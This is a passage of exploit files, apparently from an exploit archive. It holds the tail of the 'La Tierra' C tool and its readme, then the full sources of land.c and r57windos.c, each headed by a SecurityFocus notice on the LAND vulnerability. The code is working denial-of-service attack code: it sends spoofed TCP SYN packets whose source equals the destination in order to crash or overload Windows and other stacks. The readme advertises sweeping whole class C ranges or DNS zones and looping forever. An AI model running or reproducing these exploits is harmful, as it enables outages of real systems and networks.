13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n"); printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n"); printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n"); printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n"); printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n"); printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n"); printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n"); printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n"); printf("Supported:\n"); printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n"); exit(-1); } void print_arguments() { printf("Arguments: \n"); printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n"); printf(" If last octet is '-', then the address will increment\n"); printf(" from 1 to 254 (Class C) on the next loop\n"); printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER); printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n"); printf(" For list of alternative options, use -a instead of -h.\n"); printf(" * -b port# = beginning port number (required).\n"); printf(" -e port# = ending port number (optional)\n"); printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n"); printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL); printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n"); printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE); printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ); printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n"); printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY); printf(" -o 1 = supress additional output to screen, default=0\n" ); printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER); printf(" * = required ~ = default parameter values\n\n"); exit(-1); } /* End of file */ ----------------- readme.txt ------------------------------ La Tierra v1.0b - by MondoMan (KeG), [email protected] Modified version of land.c by m3lt, FLC To compile latierra, type: gcc latierra.c -o latierra To see the help screen, use 'latierra -h' This program crashes Windows 95, and will cause Windows NT 4.0, SP3 to utilize a high percentage of CPU. In some instances, CPU usage reaches %100. land.c description: land.c sends a spoofed packet with the SYN flag from the the same IP and port number as the destination. For example, if you want to do a DoS on 1.1.1.1, port 80, it would spoof 1.1.1.1 port 80 as the source. The problem is with NT4 SP3, however, is once you issue this packet to a port, NT4 SP3 appears to ignore all other attempts - UNTIL ... La Tierra! La Tierra description: La Tierra basically works by sending NT the same packet used in land.c but to more than one port (if specified). It doesn't appear to matter if the port is opened or closed! NT doesn't appear to let this happen again on the same port successively, but you simply change ports, and you can easily go back to the original port and it'll work again. What's even more interesting is the fact that port 139 works with this. You would have thought - I'll leave that alone for now! While testing, I used a Compaq dual Intel Pentium Pro 200, and was able to take up to %64 CPU. With one processor disabled, CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs time to recover, even with one spoofed packet. Features include: - Ability to launch a DoS on an entire class C address - Specify the beginning and ending port range - Specify the number of loops or make it loop forever! - User defined TCP flags: fin, syn, reset, push, ack, and urgent - Other IP options such as window size, time-to-live, sequence_number, and message_type - Ability to read a DNS zone file for IP addresses - Ability to read a ASCII file containing IP addresses Command line options: - i ip_address DEFAULT: None RANGE: Valid IP Address OPTIONAL: No where ip_address is a valid ip_address, or if you wish to cycle through a class C address, the last octet is dropped and replaced with a '-'. This option is required. The source and destination address are obtained from this value. Rather than specifying an IP address, you may wish to create an ASCII file, or better yet, use nslookup to obtain all zone information for a particular domain. The ASCII file simply contains a list of IP addresses, one on each line. To get a DNS file, simply use nslookup, and the "ls -d somedomain.com > filename.txt" command. You can use 'latierra -n' to read more about the command sequence for nslookup. In both types of files, lines that begin with ';' or '[' are ignored. In DNS files, only 'A' records are processed. Examples: Single IP Address: -i 10.1.2.1 Class C range: -i 10.1.2.- ASCII file: -i list=filename.txt DNS file: -i zone=filename.txt -b beginning_port_number DEFAULT: None RANGE: Positive Integer OPTIONAL: No where this value is the port_number that latierra will use. If no ending_port_number is specified, ending_port_number is then equal to this value. Valid range is 1 to 0xFFFF -e ending_port_number DEFAULT: If not specified, equal to beginning_port_number RANGE: Positive Integer OPTIONAL: Yes is the highest port number in the range to cycle through. Example: -i 10.1.2.1 -b 23 -e 80 will start at port 23 and increment up to port 80. You can delay the next increment by using the -s option. Valid range is 1 to 0xFFFF -s seconds_between_spoofs DEFAULT: 1 RANGE: Positive Integer OPTIONAL: Yes You may want to control the seconds between spoofs. If you specify a zero, no delays occur. In the below example, the spoof will between ports 23 and 80, every 3 seconds. -i 10.1.2.1 -b 23 -e 80 -s 3 -l number_of_loops DEFAULT: 1 RANGE: Positive Integer, -5 loops forever OPTIONAL: Yes This option if set greater than 1, will cause a repeat of the cycle. For example: -i 10.1.2.1 -b 23 -e 80 -s 0 -l 8 will cause latierra to go through ports 23 through 80 and repeat the process 8 times, with no delay. Look at the following example: -i 10.1.2.- -b 23 -e 80 -s 0 -l 8 latierra will start at 10.1.2.1, port 23 through 80, then increment to 10.1.2.2, port 23 through 80, and so on until it gets to 10.1.2.254, in which case it will repeat the same procedure over again 8 times. By specifying a value of -5 for this option, latierra will loop forever, until you manually stop the process. In the last example above, the procedure would never end. When it reaches 10.1.2.254, it falls back to 10.1.2.1 and start over again from there. Other examples: -i 10.1.2.1 -b 139 -s 0 -l -5 -i 10.1.2.- -b 80 -s 5 -l 10 -t tcp_flags DEFAULT: sp (SYN, PUSH) RANGE: valid character set (see below) OPTIONAL: Yes this option sets the various TCP flags, which include: f = fin s = syn r = reset p = push a = ack u = urgent Example: -i 10.1.2.1 -b 139 -t apu -s 0 To set the ack, push, and urgent flag -v time_to_live_value DEFAULT: 0xFF (255 decimal) RANGE: Positive Integer OPTIONAL: Yes Sets the time to live value. -p protocol_value DEFAULT: 6 (tcp) RANGE: Positive Integer OPTIONAL: Yes Sets the protocol value in the IP header. To see a list of available protocols, run "latierra -p". -w window_size_value DEFAULT: 0xFFFF (65000 decimal) RANGE: Positive long value OPTIONAL: Yes -q tcp_sequence_number_value DEFAULT: 0xF1C RANGE: Positive integer OPTIONAL: Yes -o 1 supress_additional_output DEFAULT: messages are printed for status RANGE: None OPTIONAL: Yes If you don't want to see the messages during the process, simply use this "-o 1" to turn them off. Final Note: Please use this program for in-house testing purposes only. Just because your sending spoofed packets, doesn't mean you can't be traced. Good luck. - MondoMan [email protected] -------------------- end of file -------------------------------

/* source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. */ /* land.c by m3lt, FLC crashes a win95 box */ #include <stdio.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/ip_tcp.h> #include <netinet/protocols.h> struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) { fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); }

/* source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. */ #define _BSD_SOURCE #include <stdio.h> #include <ctype.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <sysexits.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> /* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja <dejan_@_levaja.com> (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; }